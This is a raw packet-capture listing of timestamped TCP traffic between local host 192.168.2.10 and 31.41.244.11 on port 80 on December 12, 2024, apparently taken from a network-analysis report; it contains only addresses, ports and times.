                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.413978100 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.414143085 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.414932966 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.414983034 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.415112019 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.415158033 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.416088104 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.416471004 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.416517973 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.417423964 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.417694092 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.417762041 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.418268919 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.418309927 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.418564081 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.419404984 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.419450045 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.419536114 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.419636965 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.420315027 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.420428038 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.420466900 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.421341896 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.421394110 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.421550989 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.421705961 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.422522068 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.422591925 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.422708035 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.422998905 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.423530102 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.423661947 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.423691988 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.423703909 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.424546003 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.424607038 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.424696922 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.424868107 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.425664902 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.425725937 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.426759005 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.426778078 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.426867962 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.426929951 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.427077055 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.427867889 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.427880049 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.427931070 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.428829908 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.429091930 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.429157019 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.429872036 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.429915905 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.430192947 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.430982113 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.431056976 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.431803942 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.431998968 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.432037115 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.432221889 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.432224989 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.432333946 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.433099031 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.433177948 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.434036016 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.434103012 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.434130907 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.434173107 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.570641041 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.570668936 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.570724010 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.571027994 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.571090937 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.571280956 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.571361065 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.572092056 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.572179079 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.572333097 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.572380066 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.573225975 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.573303938 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.573519945 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.573570013 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.574258089 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.574310064 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.574328899 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.574393034 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.575325012 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.575383902 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.575423956 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.575661898 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.576360941 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.576414108 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.576695919 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.576745033 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.577476025 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.577583075 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.577836990 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.577974081 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.578522921 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.578579903 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.578744888 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.579091072 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.579641104 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.579732895 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.579885960 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.580024004 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.580677986 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.580733061 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.581398010 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.581449986 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.581707001 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.581754923 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.581866026 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.581981897 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.582884073 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.582942963 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.583092928 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.583142996 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.583910942 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.583957911 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.584078074 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.584126949 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.584986925 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.585030079 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.585216045 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.585259914 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.585988045 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.586047888 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.587085009 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.587109089 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.587130070 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.587157011 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.587160110 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.587244987 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.588164091 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.588219881 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.588432074 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.588478088 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.589299917 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.589361906 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.589514971 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.589567900 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.590277910 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.590327024 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.590563059 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.590662956 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.591375113 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.591428041 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.591515064 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.591599941 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.592412949 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.592466116 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.593450069 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.593511105 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.593544006 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.593555927 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.593595982 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.593616009 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.594594955 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.594644070 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.594801903 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.594846010 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.595729113 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.595777035 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.596035004 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.596081972 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.596708059 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.596752882 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.596818924 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.596863031 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.597796917 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.597865105 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.598063946 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.598189116 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.598848104 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.598897934 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.598928928 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.598970890 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.599941969 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.599992990 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.600115061 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.600156069 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.601041079 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.601090908 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.601248980 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.601293087 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.602103949 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.602155924 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.602251053 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.602339983 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.603128910 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.603226900 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.603347063 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.603431940 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.604207993 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.604266882 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.604325056 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.604406118 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.605249882 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.605308056 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.605448008 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.605499029 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.606327057 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.606374025 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.606426001 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.606623888 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.607419014 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.607481956 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.607794046 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.607846022 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.608520985 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.608592987 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.608726978 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.608777046 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.609534025 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.609581947 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.609915018 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.609963894 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.610603094 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.610657930 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.610726118 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.610991001 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.613034010 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.613064051 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.613075972 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.613086939 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.613095999 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.613107920 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.613114119 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.613821983 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.613864899 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.613940001 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.613987923 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.614907026 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.614957094 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.615117073 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.615185976 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.615961075 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.616014004 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.616056919 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.616091967 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.617089987 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.617147923 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.617425919 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.617475033 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.618190050 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.618240118 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.618607044 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.618654013 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.619172096 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.619270086 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.619529009 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.619575024 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.620264053 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.620316029 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.620388985 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.620426893 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.621350050 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.621412992 CET4993180192.168.2.1031.41.244.11
